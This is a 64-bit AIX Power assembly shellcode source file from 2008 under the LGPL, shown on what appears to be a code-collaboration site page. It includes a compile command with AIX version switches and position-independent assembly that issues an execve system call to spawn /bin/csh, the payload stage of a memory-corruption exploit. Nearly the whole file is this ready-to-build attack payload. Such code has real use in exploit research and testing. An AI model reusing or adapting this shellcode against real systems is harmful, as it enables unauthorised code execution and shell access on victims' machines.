Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
/*
2
 *  $Id: aix-power-shellcode64.S 40 2008-11-17 02:45:30Z ramon $
3
 *
4
 *  aix-power-shellcode64.S - AIX Power shellcode
5
 *  Copyright 2008 Ramon de Carvalho Valle <[email protected]>
6
 *
7
 *  This library is free software; you can redistribute it and/or
8
 *  modify it under the terms of the GNU Lesser General Public
9
 *  License as published by the Free Software Foundation; either
10
 *  version 2.1 of the License, or (at your option) any later version.
11
 *
12
 *  This library is distributed in the hope that it will be useful,
13
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
14
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
15
 *  Lesser General Public License for more details.
16
 *
17
 *  You should have received a copy of the GNU Lesser General Public
18
 *  License along with this library; if not, write to the Free Software
19
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
20
 *
21
 */
22

23
/*
24
 * Compile with the following command.
25
 * $ gcc -Wall -DAIXLEVEL -m64 -o aix-power-shellcode64 aix-power-shellcode64.S
26
 *
27
 * Where AIXLEVEL is one of the currently supported AIX levels.
28
 * -DV410   AIX 4.1.0
29
 * -DV420   AIX 4.2.0
30
 * -DV430   AIX 4.3.0
31
 * -DV433   AIX 4.3.3
32
 * -DV530   AIX 5.3.0
33
 *
34
 */
35

36
#include "aix-power.h"
37

38
    .globl .main
39
    .csect .text[PR]
40

41
.main:
42

43
shellcode64:
44
    lil     %r31,__CAL
45
    xor.    %r5,%r5,%r5
46
    bnel    shellcode64
47
    mflr    %r30
48
    cal     %r30,511(%r30)
49
    cal     %r3,-511+40(%r30)
50
    stb     %r5,-511+48(%r30)
51
    stdu    %r5,-8(%r1)
52
    stdu    %r3,-8(%r1)
53
    mr      %r4,%r1
54
    cal     %r2,__NC_execve(%r31)
55
    crorc   %cr6,%cr6,%cr6
56
    .long   0x44ffff02
57
    .asciz  "/bin/csh"
58

59

60